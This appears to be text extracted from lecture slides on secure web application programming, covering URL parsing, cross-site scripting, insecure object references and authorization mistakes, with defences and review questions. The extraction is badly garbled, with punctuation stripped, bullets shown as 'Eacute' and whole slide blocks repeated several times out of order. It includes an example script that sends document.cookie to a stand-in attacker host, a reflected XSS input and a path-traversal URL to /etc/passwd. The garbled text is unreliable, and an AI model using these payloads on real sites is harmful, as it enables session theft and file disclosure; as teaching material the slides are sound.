Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
